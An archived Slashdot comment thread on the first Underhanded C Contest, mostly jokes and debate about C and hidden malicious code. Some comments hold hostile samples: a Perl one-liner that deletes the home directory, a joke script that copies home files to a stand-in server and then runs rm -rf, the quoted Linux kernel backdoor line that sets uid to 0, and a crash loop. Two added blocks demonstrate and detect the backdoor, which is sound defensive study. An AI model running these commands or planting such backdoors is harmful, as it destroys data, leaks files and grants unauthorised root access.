Slashdot Mirror


The First Annual Underhanded C Contest

Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."

75 of 341 comments

  1. Comment removed by account_deleted · · Score: 5, Funny

    Comment removed based on user account deletion

  2. This will work by The+Original+Yama · · Score: 4, Funny

    People will do anything for beer! Who needs speech when you're gulping down a cold lager?

    1. Re:This will work by isny · · Score: 4, Funny

      Based on past experience, free beer is usually the first step toward free speech.

    2. Re:This will work by hostyle · · Score: 2, Funny

      Moderation nazi!

      --
      Caesar si viveret, ad remum dareris.
  3. in other words... by beta-guy · · Score: 4, Funny

    kill the brain cells that made innocent looking malicious code :P

    1. Re:in other words... by grammar+fascist · · Score: 3, Insightful

      On a more serious note - they should rethink their prize. Not everyone drinks beer, and there are plenty of talented programmers who avoid it completely. In fact, the ones who do probably have more working brain cells to throw at the problem.

      Yes, I know that must come as a shock, and most people here probably won't believe me...yet it's true.

      (And just to head off the inevitable nutcase looking for a Score:5, Funny: no, replacing the prize with free pr0n isn't going to cut it. :p)

      --
      I got my Linux laptop at System76.
    2. Re:in other words... by crisco · · Score: 2, Funny

      Ah, but any other self respecting, non beer drinking programmer will recognize its value as currency among lesser mortals. Even simply passing the prize along to lesser mortals can induce acts of goodwill.

      --

      Bleh!

  4. Re:What are the legal ramifications of this? by Anonymous Coward · · Score: 3, Funny

    Pussy.

  5. Re:What are the legal ramifications of this? by spellraiser · · Score: 2, Informative

    RTFA, please.

    The challenge for the first UCC is to write a simple program that performs some basic image-processing operation, for example smoothing or resampling, but manages to conceal a unique imperceptible fingerprint in each image it opens.

    The fingerprint should be different for every execution of the program. It doesn't have to have any particular meaning, but useful tracking information is worth extra points (tho getting caught is worth fewer points.) The print should be extractable from the output image by another program. Realistically, the detector will not have access to the original image for comparison purposes.

    I seriously doubt that anyone could get arrested for writing something like this, dubious legal state or not.

    --
    I hear there's rumors on the Slashdots
  6. Beer? Phui! by devross · · Score: 2, Funny

    The object is to hide evil functionality that survives visual inspection of the source.

    The prize is world domination!

    --


    If these walls could talk they'd probly still ignore me. --MF DOOM
  7. It's a bad idea by Anonymous Coward · · Score: 3, Interesting

    Count on the likes of Sun, Microsoft, and anyone else selling a non-C language to pounce on this as a marketing opportunity.

    C is a superb language. Why besmirch its reputation with a contest to make it seem as untrustworthy as possible?

    1. Re:It's a bad idea by Catamaran · · Score: 4, Insightful
      C gives you just enough rope to hang yourself.

      Java gives you a polished floor on which you can slip and break your neck.

      C++ gives you a thermo-nuclear device.

      --
      Test 1 2 3 4
    2. Re:It's a bad idea by dcam · · Score: 3, Funny

      You accidentally create a dozen instances of yourself and shoot them all in the foot. Providing emergency medical assistance is impossible since you can't tell which are bitwise copies and which are just pointing at others and saying "That's me, over there."

      Source

      --
      meh
  8. I think I might win by numbware · · Score: 4, Funny

    #include <stdio.h>
    main()
    {
    printf("Hello World");
    }

    Seemingly harmless, right? Wrong. It's still in development, but think about it. You should have to greet the world before you destroy it. :)

    --
    I'm going to go create my own technology news site, with blackjack and hookers. You know what? Forget the news site.
  9. Re:What are the legal ramifications of this? by Cryptacool · · Score: 2

    What?

    Are you serious? Entrapment is an undercover cop asking you if you want to buy drugs, then when you say no, he tries to persuade you and succeeds, possibly because you just want him to go away.

    It's really not that easy for something to qualify as entrapment, also consider that writing malicious code isn't illegal, it's free speech and no different than writing a book that urges people to do something malicious, not at all illegal.

    But no please, keep thinking everything is illegal and don't bother doing anything it makes it easier to actually make it illegal.

  10. Re: This year's challenge by ErichTheWebGuy · · Score: 4, Informative

    Any open-source steganography programs

    Why, yes! http://sourceforge.net/projects/steghide/

    --
    bash: rtfm: command not found
  11. Re:What are the legal ramifications of this? by anthony_dipierro · · Score: 4, Insightful

    The authorities start a contest such as this, an unsuspecting programmer submits a malicious program, and he or she is arrested and charged with a variety of computer crimes.

    What computer crimes would be broken?

    Frankly, I won't participate in this contest considering the current legal state of America.

    No, you won't participate because of your current state of paranoia over the legal state of America.

  12. like this? by LiquidCoooled · · Score: 5, Funny

    #include stuff.h
    void main()
    {
    /* nothing / */ /* to see / * here */
    /* whats * / challenging / * about */
    /* this */ /* there / is no */ evil /*
    screensaver(); * function */ /* here
    anyone that thinks there is * / needs */
    /* their / * / eyes testing */ ();
    }


    --
    liqbase :: faster than paper
    1. Re:like this? by Dun+Malg · · Score: 4, Funny

      Nice idea, but it doesn't look innocuous. It looks like a trick. I think the contest is for code the equivalent of a razor blade in a nice looking apple, rather than a razor blade hidden in a pile of clearly marked rat poison.

      --
      If a job's not worth doing, it's not worth doing right.
  13. Re:Indeed. This could be a field day for Java and by bcmm · · Score: 2, Informative

    RTFA. The idea is to hide the malicious functions so that the source code looks innocent.

    --
    # cat /dev/mem | strings | grep -i llama
    Damn, my RAM is full of llamas.
  14. Attack the Compiler by LionKimbro · · Score: 4, Interesting

    Why attack the source code when you can instead attack the compiler?

    You need only attack the compiler, or the linker, or the interpreter.

    1. Re:Attack the Compiler by derek_farn · · Score: 2, Informative

      For all you could possibly want to know about C, and more, check out this book (8M pdf). Those who want pure, uncommentaried, standard words can find them here.

    2. Re:Attack the Compiler by LionKimbro · · Score: 2, Insightful

      Yes, quite right.

      I guess the thing is: What we're really concerned about here, (if I may project a little,) is voting software.

      In those cases, they're probably not going to say, "download the compiler from a random site on the net." In fact, it's probably going to be very hard to control the people who compile the software, and even harder to control the people who compile the compiler. At some point, somebody's going to get the compiler, and they're going to get it from some specified place.

      If it's a secret place, then the vote is determined by whoever controls that secret place. If it's a public place, well- that's something to think about.

      Maybe we should have a Federal list of 100 places to get the compiler from. Or a thousand places. However it is done, we want to make it more expensive to buy the vote than the vote is worth.

  15. Here you go by titzandkunt · · Score: 5, Funny


    Just tuck it away in a commonly used header file, use touch to restore the last date/time of modification, and you're all set.

    #define void int

    Hours & hours of irritation & confusion!

    T&K.

    --
    Political language ... is designed to make lies sound truthful and murder respectable...
    1. Re:Here you go by Anonymous Coward · · Score: 2, Funny

      I actually did something like that once, for reasons that had nothing to do with obfuscation.

      You see, I had to write some kind of simulation program that required a huge array of numbers. I wasn't sure whether to use "long int", to avoid overflow, or "short int", to avoid wasting memory. So I thought, "OK, I'll use a typedef, and so if I pick the wrong type, I can easily change it later."

      But I was afraid that, out of habit, I would accidentally use "int" instead of my typedef. So I "temporarily" added "#define int ERROR" to my code.

      Unfortunately, by the time I got around to compiling "int main()", I had completely forgotten about that #define, and couldn't figure out where the compile error was coming from.

  16. Re:What are the legal ramifications of this? by bighoov · · Score: 5, Funny

    Can you even breathe in that tinfoil cocoon?

  17. Story is just plain bad by typical · · Score: 3, Insightful

    Everyone knows that it is possible to write malicious code in C. That's just because C gives you the near utmost control over your system, and does not discriminate based on human emotions like "good", "bad", and "malicious". Perhaps a better idea would have been to try to write malicious code in a language such as Java, which tries to prevent a programmer from writing such code. That would be a real challenge.

    Yeah, I just flip the "+good +bad -malicious" flags on javac when I want to trust code. Come on, that's ridiculous.

    This is not a hard task, but it's kind of stupid, on the order of "who can break into the most computers today" (I dunno, who can run nmap the longest?)

    There are so many *interesting* things that could be done as a programming contest, and the submitter chose something that's a pain in the ass for other people, doesn't really challenge the brain ("shortest version of X"), and can't be used for much other than bogus arguments that "C is dangerous" or the obvious card, "Open Source is insecure" (you can look at the much larger sample set of SourceForge and the lack of Trojans implanted and later discovered).

    The number of *interesting* security stories that could have challenged people and been useful is legion. "Can we have a system that is unbreakable and does X", (followed by the inevitable followup posts where people punch holes in the design) or other things. You could have asked "How can OSS projects avoid allowing malicious code being submitted?", which would have started an interesting set of threads from people who work on proof-carrying code, would have taught readers something, and maybe provided improved security for the world at large. Instead, we're going to see a handful of bad, obfuscated C, and a bunch of halfassed arguments against C and OSS, neither of which has much connection with reality. There will be some language arguments, where someone says "we should use [LANGUAGE_WITH_BOUNDSCHECKING]", some security guy that will point out that this doesn't begin to avoid stopping malicious code, someone will make some stupid arguments about how their favorite OS is more secure than anyone else's, we'll get some rehash of NX features that have been done time and time again on Slashdot...seriously, goddammit. The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day is the day I jump ship.

    --
    Any program relying on (nontrivial) preemptive multithreading will be buggy.
    1. Re:Story is just plain bad by schotter · · Score: 3, Informative

      "The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day"

      Have you seen Technocrat.net? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.

      (Or there's always ars for CS stuff, but they're hardly a /. knockoff.)

  18. Diebold by jay95 · · Score: 2, Insightful

    I nominate Diebold!
    Now if only we can get them to enter their code in the contest...

    1. Re:Diebold by ceejayoz · · Score: 2, Funny

      Pfft.

      It's supposed to survive inspection, remember. giveElectionToTheRepublican() is underhanded, but it probably won't survive inspection. ;-)

  19. Re:Seems a bit like those hacking contests by numbski · · Score: 5, Informative
    This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?
    perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'
    Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight", then it is far more dangerous. :)

    I mean I could do something like this:

    # When do you want it done?
    $today="sudo";
    $yesterday="su -c";

    # Define our globals
    $superman="ls";
    $wonderwoman="rm"
    $batman="cp";
    $aquaman="mv";

    #define some important flags
    $blows="-r";
    $maims="-p";
    $chunks="-f";
    $defeats="-s";

    #define some targets
    $your_mom="/";
    $your_dad="/usr";
    $your_sister="~";
    $your_teacher="/bin";
    $hell="/dev/null";
    $heaven="/dev/random";
    $skyhigh="nfs://myserver/myhome";

    #....later, back at Superfriends Headquarters

    `$batman $blows $your_sister $skyhigh`;
    `$wonderwoman $blows $chunks $on $your_sister`;
    `$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
    #Would you like to see the rest of the story?
    #print "Would you like to hear more? Please type your password to continue!";

    The superfriends save the day again.
    --

    Karma: Chameleon (mostly due to the fact that you come and go).

  20. Why? by simulacrum25 · · Score: 4, Insightful

    Hacking was never about malicious behaviour, it was about learning and understanding. Granted, much of what one learned could be applied in malicious ways, but that wasn't the goal. Coding contests whether they be geared towards obfuscation or speed are still learning endeavors.

    Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.

    1. Re:Why? by Nf1nk · · Score: 5, Insightful

      To find subtly malicious code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.
      It is sort of like the computer version of a bomb squad.

      --
      I used to have a cool sig, back when I cared
    2. Re:Why? by Xcott+Craver · · Score: 3, Informative
      Who is behind this and what is their motivations?

      Is Google down? Okay, I updated the faq to tell you who we are.

      Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerely hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.

      Xcott

    3. Re:Why? by Frank+T.+Lofaro+Jr. · · Score: 2, Informative

      Remember the recent Linux contamination

      Something like:

      if (blah || blah || uid=0) {
      blah;
      } ...

      --
      Just because it CAN be done, doesn't mean it should!
    4. Re:Why? by iluvcapra · · Score: 2, Insightful

      Methinks the poster refers to this, wherein some as yet unidentified party inserted a line into the kernel sources on the CVS repository.

      if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
      if these random options are passed, and the uid of the "current" struct is 0, then do the block, right? 8^o Fortunately, some sharp programmers caught this before those files got integrated back into the kernel, but who knows what the future may bring.
      --
      Don't blame me, I voted for Baltar.
  21. Re:SxE anyone??? by Hatta · · Score: 2, Funny

    The prize is beer.

    What if someone in the straight edge crowd wins?


    They can give the beer to me.

    --
    Give me Classic Slashdot or give me death!
  22. Here's my entry: by stinky+wizzleteats · · Score: 2, Funny

    title Windows
    root (hd0,0)
    chainloader +1

    Now where's my beer?

  23. Diebold Hiring the winner! by tvlinux · · Score: 4, Funny

    Help Wanted:
    Diebold needs new programmers. If you have what it takes to hide "winning" code in our election machines. Apply to Diebold Careers

  24. Re:Indeed. This could be a field day for Java and by Xcott+Craver · · Score: 3, Informative
    Correct, making it look valid is the main purpose of the contest.

    Please check out the contest page: the "evil" behavior is not something java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.

    That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.

    Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.

    Xcott

  25. Cheating? by Maxwell'sSilverLART · · Score: 2, Funny

    Am I required to submit original source code, written by me, or can I merely submit the leaked Windows source, and thus be assured of victory?

    --
    Moderate drunk! It's more fun that way!
  26. Would the Windows source code count? by Sniper_Peabody · · Score: 2, Funny

    It looks innocent but is about as evil as it gets.

  27. Subtlety by Dirtside · · Score: 5, Funny
    The prize is beer.
    ...but the beer is poisoned!
    --
    "Destroy science and religion. Science would re-emerge exactly the same; but not religion." - Penn Jillette, paraphrased
    1. Re:Subtlety by RPI+Geek · · Score: 2, Informative

      Actually I'm from upstate NY and have had a chance to try Ommegang beers; of the three that I've tried, all are excellent.

      I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.

      --

      - "Nobody came out that night, not one was ever seen. But Old Man Stauf is waiting there, crazy sick and mean!"
  28. An example from years ago by exp(pi*sqrt(163)) · · Score: 4, Interesting
    There was a bug in the Watcom compiler for DOS many years ago. As a bug report I sent them a piece of code something like:
    char *s = "Fortune coookie";
    int *p = (int *)s;  /* view the string through an int pointer */
    int i;
    for (i = 0; i<4; ++i) {
    putchar(((char *)p)[i]);  /* a correct compiler indexes this by sizeof(char) */
    }
    Looks innocent enough. But it actually printed an obscenity. There was a bug in the pointer addition code generated by the compiler so that even though (char *)p was a pointer to type char it still used sizeof(int) to index into the array and so it printed every 4th character. (And that explains why I used three o's.)
    --
    Doesn't it make you feel good to know that our freedoms are protected by politicians, lawyers and journalists.
    1. Re:An example from years ago by exp(pi*sqrt(163)) · · Score: 3, Informative

      It was for DOS4GW but I think you're being pedantic.

      --
      Doesn't it make you feel good to know that our freedoms are protected by politicians, lawyers and journalists.
  29. Some dude from Microsoft is gonna win... by swillden · · Score: 4, Funny

    He'll submit the source code to IE.

    --
    Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
  30. When will we see this pop up in the real world? by creative_Righter · · Score: 2, Interesting

    Every year, we will propose a challenge to coders to solve a simple data processing problem, but with covert malicious behavior. Examples include miscounting votes, shaving money from financial transactions, or leaking information to an eavesdropper. The main goal, however, is to write source code that easily passes visual inspection by other programmers.

    Oh dear, now we're rewarding people for writing actual malicious code that is designed to pass visual inspection from other programmers.

    When these sort of tricks will show up eventually in actual voting machines or the gigantic corpus of financial code that's been hacked together?

    Or when will we start to find the underhanded tricks in things we use?

  31. here's my entry by thdexter · · Score: 3, Funny
    #include <notavirus.h>
    #include <seriouslyitisnt.h>
    So long as they don't check notavirus.h I think I'm in the clear for visual inspection.
    --
    I'm on a road shaped like a figure eight; I'm going nowhere but I'm guaranteed to be late.
  32. easy by RailGunner · · Score: 2, Interesting
    The Windows Auto Blue screen... (yes, even XP still blows up on this):

    int main (){
    for (int i = 0; i < 100000; i++)
    printf ("\t\t\b\b\b\b\b");
    }
  33. how's this? by spongman · · Score: 5, Funny

    int main () { WinExec ("iexplore.exe"); }

    1. Re:how's this? by Anonymous Coward · · Score: 2, Funny

      It's Internet Explorer. He's assuming the computer will be compromised before it would reach the return statement.

    2. Re:how's this? by Rei · · Score: 2, Informative

      That's not very sneaky - it looks downright malicious. At the very least, who would run a program that launches a new fsck every five seconds? Even if the fs was read-only, you'll bring your system to a crawl in no time.

      What you really want is something more subtle. For example, here's an easy one using rounding errors in the core of a smoothing algorithm. Assumes a picture of width x height of type "RGB" (assumed to be a typedef'ed struct containing bytes r, g, and b) in a two-dimensional array called "picture" (and an equivalent one called "dest_picture").

      for (int x=0; x<width; x++)
      {
        const int next_x=(x+1==width ? 0 : x+1);
        const int prev_x=(x-1==-1 ? width-1 : x-1);
        for (int y=0; y<height; y++)
        {
          const int next_y=(y+1==height ? 0 : y+1);
          const int prev_y=(y-1==-1 ? height-1 : y-1);

          /* each sample is divided by 9 before it is added up */
          const RGB point1 = picture[prev_x][prev_y];
          const char point1_r = point1.r / 9;
          const char point1_g = point1.g / 9;
          const char point1_b = point1.b / 9;

          const RGB point2 = picture[x][prev_y];
          const char point2_r = point2.r / 9;
          const char point2_g = point2.g / 9;
          const char point2_b = point2.b / 9;
          // Etc - continue for 9 points from prev_x to next_x, prev_y to next_y

          const char dest_r = point1_r + point2_r + point3_r + point4_r + point5_r + point6_r + point7_r + point8_r + point9_r;
          const char dest_g = point1_g + point2_g + point3_g + point4_g + point5_g + point6_g + point7_g + point8_g + point9_g;
          const char dest_b = point1_b + point2_b + point3_b + point4_b + point5_b + point6_b + point7_b + point8_b + point9_b;

          dest_picture[x][y].r=dest_r;
          dest_picture[x][y].g=dest_g;
          dest_picture[x][y].b=dest_b;
        }
      }

      In case you didn't catch what it does, by dividing by nine before accumulating instead of afterwards, we're losing more color resolution. You'll never see values 253, 254, or 255, for example, in r, g, or b. There will also be a sawtooth pattern in what were initially smooth gradients on a per-channel basis (less noticeable when the image is viewed as a whole). It's not perfect, but it is a start. The possibilities really increase when doing things that add noise to an image; skewing a randomization function is trivially easy.

      If you want to be really devious, though, you need to mess with program internals. Overflow a string to mess with your function's frame return parameter, for example. You could also do things like deliberately cause signals to be thrown that you catch. There's a lot of possibilities. :) I can't wait to see the results.

      --
      "This wallpaper is killing me. One of us has got to go." -- Oscar Wilde on his deathbed
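Added example (not part of the original thread): the divide-before-accumulate order described in the comment above, run on one channel of a constructed image beside the sum-then-divide order. The image size, `struct image` and all function names are assumptions made for the demo; it measures the 252 ceiling on an all-white input and the per-pixel error on a smooth ramp.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define W 256   /* constructed test-image size, not taken from the comment */
#define H 4

/* One colour channel, indexed [x][y] like picture[x][y] in the comment. */
struct image { unsigned char px[W][H]; };

/* 3x3 box smoothing with wrap-around edges.
 * div_first != 0: divide every sample by 9, then add (the comment's order).
 * div_first == 0: add the nine samples in an int, divide once. */
static void smooth(const struct image *src, struct image *dst, int div_first)
{
    for (int x = 0; x < W; x++) {
        for (int y = 0; y < H; y++) {
            int acc = 0;
            for (int dx = -1; dx <= 1; dx++) {
                for (int dy = -1; dy <= 1; dy++) {
                    int v = src->px[(x + dx + W) % W][(y + dy + H) % H];
                    acc += div_first ? v / 9 : v;   /* v / 9 truncates */
                }
            }
            dst->px[x][y] = (unsigned char)(div_first ? acc : acc / 9);
        }
    }
}

static int max_value(const struct image *im)
{
    int m = 0;
    for (int x = 0; x < W; x++)
        for (int y = 0; y < H; y++)
            if (im->px[x][y] > m) m = im->px[x][y];
    return m;
}

static int max_abs_diff(const struct image *a, const struct image *b)
{
    int m = 0;
    for (int x = 0; x < W; x++)
        for (int y = 0; y < H; y++) {
            int d = abs((int)a->px[x][y] - (int)b->px[x][y]);
            if (d > m) m = d;
        }
    return m;
}

/* Brightest output level after smoothing an all-white (255) image. */
int white_ceiling(int div_first)
{
    static struct image src, dst;
    memset(&src, 255, sizeof src);
    smooth(&src, &dst, div_first);
    return max_value(&dst);
}

/* Largest per-pixel gap between the two orders on a horizontal ramp
 * (pixel value == x): the height of the sawtooth in a smooth gradient. */
int ramp_max_error(void)
{
    static struct image src, good, bad;
    for (int x = 0; x < W; x++)
        for (int y = 0; y < H; y++)
            src.px[x][y] = (unsigned char)x;
    smooth(&src, &good, 0);
    smooth(&src, &bad, 1);
    return max_abs_diff(&good, &bad);
}

int main(void)
{
    printf("all-white input, sum then divide: max %d\n", white_ceiling(0));
    printf("all-white input, divide then sum: max %d\n", white_ceiling(1));
    printf("ramp input, largest per-pixel error: %d levels\n", ramp_max_error());
    return 0;
}
```

A reviewer checking a filter like this can feed it a flat maximum-value image and a ramp and compare against a reference implementation; the ceiling and the periodic error are visible in the numbers even when the picture looks fine.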
  34. Re:Indeed. This could be a field day for Java and by argent · · Score: 2, Insightful

    That'll make it a real challenge, since the designers of Java made an effort to make it difficult to write malicious code in the first place.

    Actually, that's not really the case... not for the kind of "malicious code" that they're talking about here. They're not talking about "getting out of the sandbox", they're talking about "hiding information in the output". It's actually a lot easier to hide this kind of "malicious code" in an object-oriented language because you can play games with the namespace.

  35. Re:There you programmers go again... by bennomatic · · Score: 2, Insightful

    No, not seriously. I was just reading an article on the Patriot Act, though, and was thinking about how the masses--the same ones who are willing to accept that using BitTorrent is equivalent to terrorism--might see this sort of endeavor.

    --
    The CB App. What's your 20?
  36. Linux Kernel Backdoor Attempt by Johnny+Hardcore · · Score: 5, Informative

    This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

    The attempt was trying to insert

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

    inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).
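Added example (not part of the original thread, and not kernel code): the condition quoted above and in the earlier "Re:Why?" replies, modelled on a stand-in `struct task`, beside the comparison it imitates, plus a deliberately simple scanner that flags a bare `=` inside an `if (...)`. The struct, the function names and the sample strings are assumptions made for the demo; the scanner ignores comments, string literals and operators such as `<<=`.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Flag values for the demo only; guarded in case the C library defines them. */
#ifndef __WCLONE
#define __WCLONE 0x80000000u
#endif
#ifndef __WALL
#define __WALL   0x40000000u
#endif

struct task { unsigned uid; };   /* hypothetical stand-in for the kernel's task */

/* The condition exactly as quoted. The assignment yields 0, so the condition
 * as a whole is always false: the guarded branch never runs and ordinary
 * testing sees nothing, but the uid has been overwritten on the way. */
int check_as_quoted(struct task *current, unsigned options)
{
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        return 1;
    return 0;
}

/* The comparison a reader assumes they are looking at. Taking the task
 * through a const pointer turns the assignment form into a compile error. */
int check_comparison(const struct task *current, unsigned options)
{
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        return 1;
    return 0;
}

/* Count '=' characters inside if-conditions that are not part of
 * ==, !=, <= or >=. Compound assignments such as += are counted too. */
int assignments_in_conditions(const char *src)
{
    int hits = 0;
    for (const char *p = src; (p = strstr(p, "if")) != NULL; p += 2) {
        if (p > src && (isalnum((unsigned char)p[-1]) || p[-1] == '_'))
            continue;                       /* "if" is the tail of a longer word */
        const char *q = p + 2;
        while (*q == ' ' || *q == '\t')
            q++;
        if (*q != '(')
            continue;                       /* e.g. "ifdef" */
        int depth = 0;
        for (; *q; q++) {
            if (*q == '(') {
                depth++;
            } else if (*q == ')') {
                if (--depth == 0)
                    break;                  /* end of this condition */
            } else if (*q == '=') {
                if (q[1] == '=') { q++; continue; }          /* "==" */
                if (q[-1] == '!' || q[-1] == '<' || q[-1] == '>')
                    continue;                                /* "!=", "<=", ">=" */
                hits++;
            }
        }
    }
    return hits;
}

/* Constructed sample lines: the quoted condition and its comparison form. */
static const char QUOTED_LINE[] =
    "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))";
static const char COMPARE_LINE[] =
    "if ((options == (__WCLONE|__WALL)) && (current->uid == 0))";

int main(void)
{
    struct task t = { 1000 };
    int taken = check_as_quoted(&t, __WCLONE|__WALL);
    printf("as quoted:  branch taken=%d, uid afterwards=%u\n", taken, t.uid);

    struct task u = { 1000 };
    taken = check_comparison(&u, __WCLONE|__WALL);
    printf("comparison: branch taken=%d, uid afterwards=%u\n", taken, u.uid);

    printf("scanner hits: quoted=%d comparison=%d\n",
           assignments_in_conditions(QUOTED_LINE),
           assignments_in_conditions(COMPARE_LINE));
    return 0;
}
```

Because `&&` short-circuits, the write only happens when both flags are passed, which is why a review that exercises the function with ordinary arguments does not notice it.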

  37. Re:Beer by spauldo · · Score: 2, Interesting

    They used to use the back section of planes to make ice cream (the cold and vibration from the propeller planes was perfect for it). It was air force tradition for quite some time.

    It really just depends on what kind of plane you're talking about. I'm sure there's areas on even modern large-body jets where there's an uninsulated section large enough for a keg.

    --
    Those who can't do, teach. Those who can't teach either, do tech support.
  38. C is an awful language by Urusai · · Score: 2, Informative

    You're just used to it. Problems: difficult to compile, difficult to convert to better languages (thank you preprocessor), encourages obfuscation, some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings. That's just off the top of my head.

    1. Re:C is an awful language by jejones · · Score: 3, Insightful

      Well...

      C is good for what it was first used for: writing Unix. At least initially, it was minimalistic; orthogonality took a back seat to ease of implementation. (See Gabriel's classic essay for details.)

      (It's certainly not flawless. Any language that needs a utility like cdecl to make declarations understandable has problems, and there should've been a Boolean type from the beginning. It would be nice if char (which should be whatever represents a glyph on the target system) weren't conflated with short short int. Basically, if C were in your back yard, it would be declared an "attractive nuisance.")

      I think the authors of The Art of Unix Programming wisely recognize that C, like any other tool, should be used only where appropriate. (Sorry if that's tautological, but I can't think of a better way to put it.)

  39. So The Hard Part Is To by Master+of+Transhuman · · Score: 4, Funny

    "write clear, readable, innocent-looking C code", right?

    Wow, nobody's going to win this one.

    --
    Richard Steven Hack - This sig is TOO GODDAMN SHORT TO DO ANYTHING USEFUL WITH! MORONS!
  40. Re:If crashing is "malicious behavior" by proverbialcow · · Score: 2, Funny

    doesn't that make basically all c code underhanded?

    Nope. Only the code that includes

    #include <windows.h>

    *ducks*

    --
    The only surefire protection against Microsoft infections is abstinence. - The Onion
  41. Obligatory simpsons paraphrase by Sentry21 · · Score: 4, Funny

    Programmer: 'Take this source code, but beware! It carries a terrible curse!'
    Judge: 'That's bad.'
    Programmer: 'But it's optimized for PowerPC!'
    Judge: 'That's good!'
    Programmer: 'PowerPC is also cursed.'
    Judge: 'That's bad.'
    Programmer: 'But you get your choice of operating systems!'
    Judge: 'That's good!'
    Programmer: 'The operating systems run on Intel.' *pause* 'That's bad.'
    Judge: 'Can I go now?'

  42. You're just not used to it. by Tyler+Durden · · Score: 4, Insightful
    Problems: difficult to compile

    A picky compiler is a blessing, not a curse. It's much easier to identify and fix compile errors than run-time errors.

    difficult to convert to better languages (thank you preprocessor)

    Meaningless troll.

    encourages obfuscation

    Unless the compiler is literally holding a gun to your head, this is meaningless. In C you have nearly limitless control to write your code the way you feel is clearest. If it came out obfuscated then you have nobody to blame but yourself.

    some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings.

    Tacked on? If you don't like the way constructs are set up then fine, that's your opinion. But if you read The C Programming Language you can tell that every single construct was scrutinized over for the proper balance of efficiency (why it makes sense to pass array parameters as pointers and structs as copies) and consistency (why data types are declared the way they are. Declaration and use of data is made to match.) Do you honestly believe the creators/first users of C, some of the greatest programmers who ever lived, really said, "Ahhh, fuck it. Let's just throw something together," when designing their own programming tools?

    Most people who don't like C are really just saying they don't like low-level programming because that's what it was designed for, and that's what it's perfect for. Too many newbie programmers get used to some modern, flash-in-the-pan, all-things-to-all-people languages and when they are faced with the challenges of low-level languages rashly conclude that it's the language's fault they're having problems.

    C is the perfect language for the job it was designed for. The same cannot be said for most more modern languages.

    --
    Happy people make bad consumers.
    1. Re:You're just not used to it. by Tyler+Durden · · Score: 2, Insightful

      No flame. There are problems with C, I'll grant that. I don't know if the problem with the pre-processor is that it's too powerful or by convention it is depended on too much. Unfortunately, in some places it requires #defines where a const variable would be better. That and macros for functions where a simple inline keyword would help tremendously. Of course, these have been addressed in C++ and (I think) C99.

      I'm not sure about strings. With the really low level stuff like OS development, I can see the case for just contiguous characters terminated by a NULL character. Otherwise it's not so hot.

      But I still maintain that C works extremely well for what it was created for. I mean, how long did it take before it needed to change as opposed to C++ that becomes more complex by the hour? (I really have a love/hate attitude towards C++. I think it's a horrible language to match the needs of a horrible world. Then again, I should look more into Objective C.)

      C99 addresses a lot of valid concerns with the language, though. That and D sounds promising.

      --
      Happy people make bad consumers.
    2. Re:You're just not used to it. by Dun+Malg · · Score: 2, Insightful
      2. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start?

      Clarity. All the data types in C are intended to be clear. It's only a single step up from assembly, really. C handles strings the same way assembly does: it eats bytes sequentially from an array, and it's up to the programmer to tell the program when it's had enough. Data handling in C is a virtually transparent veneer of abstraction from pointer arithmetic. A string data type with length encoded into it would require special handling, and C just don't play that game. C is all about pounding raw bytes and twiddling naked bits. If you want fancy meta-data, you're using the wrong language. Try C++ or Java.

      --
      If a job's not worth doing, it's not worth doing right.
    3. Re:You're just not used to it. by syle · · Score: 2, Insightful
      2. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start?

      I think you're confusing C with a high-level language. It doesn't give you lists, associative arrays, or strings because those are high-level data types and C is a low-level language. Your complaints are like saying the biggest problem with a car is you can't drive it on water -- they display a fundamental misunderstanding of the subject.

      --

      /syle

    4. Re:You're just not used to it. by csirac · · Score: 3, Insightful

      I think it is very odd you can't believe we're still using C in operating systems. What other language are we going to use for this task?

